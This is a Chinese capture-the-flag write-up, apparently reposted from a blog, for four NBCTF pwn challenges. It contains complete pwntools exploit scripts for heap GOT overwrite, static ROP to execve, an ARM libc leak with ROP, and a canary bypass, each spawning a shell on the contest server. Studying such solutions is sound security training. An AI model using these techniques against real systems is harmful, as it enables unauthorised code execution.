本文介绍: day2打了一个叫NBCTF的比赛做了四个题,剩下五道arm的题不会做了,关注一下wp,也许可以靠这个比赛提升一波异架构能力。

day2打了一个叫NBCTF的比赛

做了四个题,剩下五道arm的题不会做了,关注一下wp,也许可以这个比赛提升一波异架构能力。

heapnotes

2.31简单堆题,没啥好说的,直接改got就行了

from re import L
from pwn import *
from ctypes import *
from struct import pack
from io import BytesIO
import binascii
from PIL import Image
#context.log_level = 'debug'
context.arch='amd64'
#io=process("./pwn")
#io = remote("tamuctf.com", 443, ssl=True, sni="encryptinator")
io=remote('chal.nbctf.com',30172)
#io = process(['./pwn'],env={"LD_PRELOAD":"./libc64.so"})
elf=ELF('./pwn')
#io = remote('arm.nc.jctf.pro', 17916)
#io=process(["qemu-ppc", "-g", "4321", "./pwn"])
#io=process(["qemu-aarch64",  "-L", "/usr/aarch64-linux-gnu", "./pwn"])
#print("please start gdb")
#s=raw_input()
libc = ELF('./libc.so.6')
#libc = ELF('./libc-2.31.so')
rl = lambda    a=False        : io.recvline(a)
ru = lambda a,b=True    : io.recvuntil(a,b)
rn = lambda x            : io.recvn(x)
sn = lambda x            : io.send(x)
sl = lambda x            : io.sendline(x)
sa = lambda a,b            : io.sendafter(a,b)
sla = lambda a,b        : io.sendlineafter(a,b)
irt = lambda            : io.interactive()
dbg = lambda text=None  : gdb.attach(io, text)
# lg = lambda s,addr        : log.info('33[1;31;40m %s --> 0x%x 33[0m' % (s,addr))
lg = lambda s            : log.info('33[1;31;40m %s --> 0x%x 33[0m' % (s, eval(s)))
uu32 = lambda data        : u32(data.ljust(4, b'x00'))
uu64 = lambda data        : u64(data.ljust(8, b'x00'))
def menu(choice):
    sla("> ",str(choice))
def add(context):
    menu(1)
    sla("Input note data: ",context)
def show(index):
    menu(2)
    sla("): ",str(index))
def edit(index,context):
    menu(3)
    sla("): ",str(index))
    sla("Input note data: ",context)
def free(index):
    menu(4)
    sla("): ",str(index))

bss=0x404120
add('/bin/shx00')
add('a'*8)
add('/bin/shx00')
free(0)
free(1)
show(1)
heapbase=u64(io.recvline()[:-1].ljust(8,'x00'))-0x2a0
lg("heapbase")
edit(1,'a'*0x10)
free(1)
add(p64(0x404020))
add('a'*8)
add(p64(elf.plt['system']))
show(2)
#gdb.attach(io)
irt()

ribbit

直接写rop硬拿shell就好,不用管它什么所谓的win函数,反正程序静态编译的,什么gadget都有

from re import L
from pwn import *
from ctypes import *
from struct import pack
from io import BytesIO
import binascii
from PIL import Image
#context.log_level = 'debug'
context.arch='amd64'
#io=process("./pwn")
#io=gdb.debug('./pwn','b*0x401922')
io=remote("chal.nbctf.com",30170)
#io = remote("tamuctf.com", 443, ssl=True, sni="encryptinator")
#io=remote('chal.nbctf.com',30172)
#io = process(['./pwn'],env={"LD_PRELOAD":"./libc64.so"})
elf=ELF('./pwn')
#io = remote('arm.nc.jctf.pro', 17916)
#io=process(["qemu-ppc", "-g", "4321", "./pwn"])
#io=process(["qemu-aarch64",  "-L", "/usr/aarch64-linux-gnu", "./pwn"])
#print("please start gdb")
#s=raw_input()
#libc = ELF('./libc.so.6')
#libc = ELF('./libc-2.31.so')
rl = lambda    a=False        : io.recvline(a)
ru = lambda a,b=True    : io.recvuntil(a,b)
rn = lambda x            : io.recvn(x)
sn = lambda x            : io.send(x)
sl = lambda x            : io.sendline(x)
sa = lambda a,b            : io.sendafter(a,b)
sla = lambda a,b        : io.sendlineafter(a,b)
irt = lambda            : io.interactive()
dbg = lambda text=None  : gdb.attach(io, text)
# lg = lambda s,addr        : log.info('33[1;31;40m %s --> 0x%x 33[0m' % (s,addr))
lg = lambda s            : log.info('33[1;31;40m %s --> 0x%x 33[0m' % (s, eval(s)))
uu32 = lambda data        : u32(data.ljust(4, b'x00'))
uu64 = lambda data        : u64(data.ljust(8, b'x00'))
rdi_ret=0x000000000040201f
rsi_ret=0x000000000040a04e
rdx_ret=0x000000000047fe1a
rax_ret=0x0000000000449267
win=0x401825
puts=0x40c7b0
t_read=0x448800
bss=0x4C6800
syscall=0x0000000000401dd4

payload='a'*0x28+p64(rdi_ret)+p64(0)+p64(rsi_ret)+p64(bss)+p64(rdx_ret)+p64(8)+p64(t_read)+p64(rdi_ret)+p64(bss)+p64(rsi_ret)+p64(0)+p64(rdx_ret)+p64(0)+p64(rax_ret)+p64(59)+p64(syscall)
#payload='You got this!'+'x00'*8+'Just do it!'+'x00'*8+p64(rdi_ret)+p64(0xF10C70B33F)+p64(rax_ret)+p64(rsi_ret)+p64(win)
sla("Can you give my pet frog some motivation to jump out the hole?",payload)
io.send('/bin/shx00')
irt()

ret2thumb

自己qemuarm可以直接怼shellcode,用它给的就不行,有点奇怪,而且每天这个题和thumb有什么关系,直接泄露libc然后迁移到bss上直接rop就行,不过要事先找到能控制r0的gadget,直接ROPgadget搜只能搜到控制fp,r3和r4的gadget,但是仔细找的话会发现如果把0x10500地址处的mov r0,r3;pop {fp,pc} 和pop {r3,pc}结合起来的话是可以做到直接控制r0的这也是为什么可以直接泄露libc去进行rop原因

from re import L
from pwn import *
from ctypes import *
from struct import pack
from io import BytesIO
import binascii
from PIL import Image
#context.log_level = 'debug'
context.arch='arm'

#io=process("./pwn")
#io = remote("tamuctf.com", 443, ssl=True, sni="encryptinator")
io=remote('chal.nbctf.com',30175)
#io = process(['./pwn'],env={"LD_PRELOAD":"./libc64.so"})
elf=ELF('./pwn')
#io = remote('arm.nc.jctf.pro', 17916)
#io=process(["qemu-ppc", "-g", "4321", "./pwn"])
#io=process(["./qemu-arm",  "-g","4321","-L", ".", "./pwn"])
#io=process(["./qemu-arm",  "-L", ".", "./pwn"])
#print("please start gdb")
s=raw_input()
libc = ELF('./libc.so.6')
#libc = ELF('./libc-2.31.so')
rl = lambda    a=False        : io.recvline(a)
ru = lambda a,b=True    : io.recvuntil(a,b)
rn = lambda x            : io.recvn(x)
sn = lambda x            : io.send(x)
sl = lambda x            : io.sendline(x)
sa = lambda a,b            : io.sendafter(a,b)
sla = lambda a,b        : io.sendlineafter(a,b)
irt = lambda            : io.interactive()
dbg = lambda text=None  : gdb.attach(io, text)
# lg = lambda s,addr        : log.info('33[1;31;40m %s --> 0x%x 33[0m' % (s,addr))
lg = lambda s            : log.info('33[1;31;40m %s --> 0x%x 33[0m' % (s, eval(s)))
uu32 = lambda data        : u32(data.ljust(4, b'x00'))
uu64 = lambda data        : u64(data.ljust(8, b'x00'))
main=0x10510
bss=0x12600
gadget=0x104F0
r3_pc=0x00010388
r0_r3=0x10550
payload='a'*0x20+p32(bss)+p32(r3_pc)+p32(elf.got['puts'])+p32(r0_r3)+p32(bss+0x24)+p32(gadget)+p32(0)+p32(bss)
sla("Can you ret2thumb? n",payload)
libcbase=u64(io.recvline()[:-1].ljust(8,'x00'))-libc.sym['puts']
lg("libcbase")
#shellcode=asm(shellcraft.thumb.sh())
system=libcbase+libc.sym['system']
payload='a'*0x24+p32(r3_pc)+p32(bss+0x38)+p32(r0_r3)+p32(bss)+p32(system)+'/bin/shx00'
io.sendline(payload)
irt()

canary-in-a-coal-mine

程序给了gets,还给了在栈上写某条从已知地址出发的链上的任意个数据,有canary,给了后门,所以直接用大量后门地址覆盖然后利用给的功能在bss找一个能指向canary的地址写到对应位置绕过canary保护就可

from re import L
from pwn import *
from ctypes import *
from struct import pack
from io import BytesIO
import binascii
from PIL import Image
context.log_level = 'debug'
context.arch='arm'

#io=process("./pwn")
#io = remote("tamuctf.com", 443, ssl=True, sni="encryptinator")
io=remote('chal.nbctf.com',30178)
#io = process(['./pwn'],env={"LD_PRELOAD":"./libc64.so"})
elf=ELF('./pwn')
#io = remote('arm.nc.jctf.pro', 17916)
#io=process(["qemu-ppc", "-g", "4321", "./pwn"])
#io=process(["./qemu-arm",  "-g","4321","-L", ".", "./pwn"])
#io=process(["./qemu-arm",  "-L", ".", "./pwn"])
#print("please start gdb")
s=raw_input()
libc = ELF('./libc.so.6')
#libc = ELF('./libc-2.31.so')
rl = lambda    a=False        : io.recvline(a)
ru = lambda a,b=True    : io.recvuntil(a,b)
rn = lambda x            : io.recvn(x)
sn = lambda x            : io.send(x)
sl = lambda x            : io.sendline(x)
sa = lambda a,b            : io.sendafter(a,b)
sla = lambda a,b        : io.sendlineafter(a,b)
irt = lambda            : io.interactive()
dbg = lambda text=None  : gdb.attach(io, text)
# lg = lambda s,addr        : log.info('33[1;31;40m %s --> 0x%x 33[0m' % (s,addr))
lg = lambda s            : log.info('33[1;31;40m %s --> 0x%x 33[0m' % (s, eval(s)))
uu32 = lambda data        : u32(data.ljust(4, b'x00'))
uu64 = lambda data        : u64(data.ljust(8, b'x00'))
win=0x10828
def menu(choice):
    sla("> ",str(choice))
def mine(index,depth):
    menu(1)
    sla("mining positionn> ",str(index))
    sla("mining depthn> ",str(depth))
def extract(index):
    menu(2)
    sla("minecart numbern> ",str(index))
def gets(payload):
    menu(3)
    sla("collapsing mineshaftn> ",payload)
payload=p32(win+1)*0x20
gets(payload)
guard=0x21038
mine(0x21038,2)
extract(8)
menu(4)
irt()

原文地址:https://blog.csdn.net/weixin_46483787/article/details/134752187

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任

如若转载,请注明出处:http://www.7code.cn/show_32188.html

如若内容造成侵权/违法违规/事实不符,请联系代码007邮箱suwngjj01@126.com进行投诉反馈,一经查实,立即删除

发表回复

您的邮箱地址不会被公开。 必填项已用 * 标注